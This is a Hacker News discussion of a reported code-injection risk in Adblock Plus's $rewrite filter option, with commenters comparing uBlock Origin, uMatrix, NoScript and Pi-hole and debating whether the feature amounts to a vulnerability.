
Adblock Plus filter lists may execute arbitrary code in web pages - dessant
https://armin.dev/blog/2019/04/adblock-plus-code-injection/
======
k1m
Good advice:

"Users may also switch to uBlock Origin.[1] It does not support the $rewrite
filter option and it is not vulnerable to the described attack."

[1] [https://github.com/gorhill/uBlock](https://github.com/gorhill/uBlock)

~~~
magduf
There have been many good reasons to switch to uBlock Origin _long_ before
today's issue: speed, memory footprint, no "acceptable ads", etc. I don't know
why anyone still uses ABP.

~~~
angott
It's mostly a marketing issue in my opinion. ABP was the first ad-blocker to
enter the mainstream market back during the Firefox days, and they had
virtually no competition for half a decade, before the entire Acceptable Ads
controversy. I think unfortunately there is still a significant number of
users who just associate "AdBlock == AdBlock Plus".

~~~
gorhill
> a significant number of users who just associate "AdBlock == AdBlock Plus"

AdBlock uses Adblock Plus filtering engine internally and also supports and
enables "Acceptable Ads" by default:

> AdBlock is a popular ad blocking extension for Chrome, Opera and Safari, now
> based on the Adblock Plus code.[1]

* * *

[1] [https://github.com/betafish-inc/adblock-
releases](https://github.com/betafish-inc/adblock-releases)

~~~
angott
Oh, sorry, I was not referring to specifically that AdBlock extension. I
wanted to say that users just associate "adblocking extension = AdBlock Plus".

~~~
gorhill
Ah I see, never mind then; and in that case I do agree with your comment.

~~~
shpx
Any chance you're going to get the uBlock name back? Explaining the story
every time I tell someone to switch to uBlock _Origin_ is annoying.

------
gorhill
> Users may also switch to uBlock Origin. It does not support the $rewrite
> filter option

Support for this filter option was discussed (and declined) in uBlock Origin's
issue tracker: [https://github.com/uBlockOrigin/uBlock-
issues/issues/46](https://github.com/uBlockOrigin/uBlock-issues/issues/46)

~~~
joncrane
Damn, the developer of uBlock Origin recognized the problem with it
immediately, explained it, and shut it down.

~~~
shawnz
He is also the person who posted the parent comment :)

------
SquareWheel
It's a bit disingenuous to refer to this as an "exploit" all throughout the
article. It's a feature, and an intended one at that. It's offering whitelist
maintainers more power over their filters. You can disagree with its inclusion
in the spec (as I do), but you should make an argument on that premise
instead.

Calling it an exploit is no different than claiming .exe files are exploits
because they allow arbitrary code to run. Or that browser extensions are
exploits because they too can manipulate the page.

~~~
nneonneo
It’s rightly referred to as a vulnerability; the term exploit is used to
describe a realistic scenario that is enabled by the vulnerable code.

The problem is that you can’t necessarily trust filter maintainers to be
completely honest. Users don’t regularly audit the thousands of rules in their
filter lists, so a bad or compromised filter could easily introduce a
malicious filter in an update. The $rewrite rule lets a filter change what
code is being loaded by a webpage (under certain fairly realistic situations).

~~~
SquareWheel
>The problem is that you can’t necessarily trust filter maintainers to be
completely honest.

I agree with that, and it's not a strong security model. But my original point
is that the author is using a bad faith argument by describing a feature they
dislike as an exploit. It's in spec for what the original authors intended.
Just like running an executable program is potentially risky, but a design of
the system.

~~~
williamscales
> the author is using a bad faith argument by describing a feature they
> dislike as an exploit

I read the article and perhaps it's been edited since you commented, but the
author states in the introduction that there is a security vulnerability in a
feature and provides an exploit. That to me is quite different from calling
the feature itself an exploit.

> It's in spec for what the original authors intended. Just like running an
> executable program is potentially risky, but a design of the system.

While it's true that it is in spec, I see a big difference in terms of how
users experience this situation compared to running an executable program. I
see this as more analogous to new feature introduced in an executable format
that offers a different security guarantee to what users are already
comfortable with. I don't see pointing this out as being in bad faith.

~~~
SquareWheel
I don't believe it's been edited (or I haven't noticed such an edit). However
on a subsequent re-read, I can see the author's usage of the term "exploit" is
more specific to his example below (the Google Maps attack demo).

While I'd still argue it's "working as intended" (for better or worse), he is
at least calling this specific demonstration an exploit rather than the
feature as a whole. So I'll step back from that position, at least part way.

Thank you for the clarification on that point.

------
userbinator
I feel like this is another instance of "useful feature gets removed because
of security vulturism[1]" \--- something which has been happening for a while,
but has gotten infuriatingly frequent lately. In this case, the mere fact that
you're using a third-party list already suggests trust of the author, or at
least an implicit acknowledgement that your ideas of what should be filtered
agree.

 _Ad blocking extensions should consider dropping support for the $rewrite
filter option. It’s always possible to abuse the feature to some degree, even
if only images or style sheets are allowed to be redirected._

The classic "ban it because it can be abused" mindset. Let's ban the use of
computers too, certainly that would be more secure!

 _Google has been notified about the exploit, but the report was closed as
“Intended Behavior”, since they consider the potential security issue to be
present solely in the mentioned browser extensions._

As they should, because what user-agents are doing have nothing whatsoever to
do with their site.

(Disclaimer: I don't use ABP nor uBlock nor any in-browser blocking
extensions, so I have no conflicts of interest here. I use a full MITM proxy
which is far more powerful than anything you can do with a browser extension.
I wonder what he'll think about that...)

[1]
[https://news.ycombinator.com/item?id=19660677](https://news.ycombinator.com/item?id=19660677)

~~~
Forge36
It could have been implemented in a more restrictive way to prevent this issue
and allow more targeted behaviors, instead it allows third party lists (which
already require a users trust) to run code. Previously this wasn't the case.

Can your MITM proxy modify HTTPS traffic? If so, how did you configure your
machines to trust the cert you're using?

~~~
userbinator
_Can your MITM proxy modify HTTPS traffic? If so, how did you configure your
machines to trust the cert you 're using?_

Yes, of course. It wouldn't be very useful otherwise. The proxy has its own
CA, and I install the cert into the trusted roots of all the machines I use.

------
Animats
Making ad block filter lists Turing-complete: really bad idea.

------
d0bby
People are talking about uBlock Origin...

I really like it, no doubts it's good and everyone should consider using it.

BUT, since we are talking about uBlock Origin, I'd like to mention another
awesome extention Raymond Hill made.

uMatrix
([https://github.com/gorhill/uMatrix](https://github.com/gorhill/uMatrix))

uMatrix alone is very powerful, and will prevent most ads.

Yes you as a user need to do the work, but the result is better.

If you like the idea of uMatrix, you may also look at NoScript!

Actually, I live almost ad free using NoScript + uBlock Origin for at least 2
yrs.

$rewrite... what a dumb feature btw!

~~~
darkpuma
I find uMatrix+uBO (with uMatrix set to block everything by default and uBlock
Origin set to it's default easy mode) to be best setup. Ads virtually never
get through, and most websites don't need javascript at all to read the
articles so my uMatrix whitelist is actually surprisingly small.

------
Y_Y
Well the solution is easy: we just see which of the filterlist publishers are
trustworthy and which aren't, and have the extension automatically download
this listlist and apply it to its list of filterlists. Of course you need to
be sure that the listlist is of trustworthy origin, but you can just check if
the supplier of the listlist is itself on the listlist.

------
ycombonator
More reasons to run Pihole, the setup just took 20 mins including installing
Rasbian. Anyone know how to mimic ublock origins filter list in Pihole ?

~~~
steve19
Unlock can block page elements while pi hole can only block dns. So if the ad
is served from the same domain as the site you are visiting, pi hole cannot do
anything about it, but ublock can.

------
nitrohorse
Some discussion by gorhill 11 months ago about this:
[https://github.com/uBlockOrigin/uBlock-
issues/issues/46#issu...](https://github.com/uBlockOrigin/uBlock-
issues/issues/46#issuecomment-391303700)

------
deevolution
Switch to brave!

------
OrgNet
one more reason not to use it... too bad the people using it won't ever read
that (they should have switched years ago, so we know they don't read this
kind of news)

------
burtonator
I wonder if we need a non-turning complete library for chrome extensions like
we have for some packet filtering libraries and bitcoin script.

No regex.

No loops.

Constrained list of functions.

This could go a long way towards opening up the web to more extensions but
also keeping it more secure.

I recently did a rev to the Polar chrome extension:

[https://chrome.google.com/webstore/detail/polar-pdf-web-
and-...](https://chrome.google.com/webstore/detail/polar-pdf-web-and-
documen/jkfdkjomocoaljglgddnmhcbolldcafd?hl=en)

and I had to request a new permission for filtering and they're now taking a
WEEK to approve my any updates due to code review.

I really only need to evaluate a URL and add headers.

This doesn't need to be turing complete.

I basically just need to take a HTTP response and headers if they're missing
when a specific origin is set.

~~~
tekstar
This is where Safari content blocking extensions are now. The extensions
register a list of URLs with Safari with instructions to block.

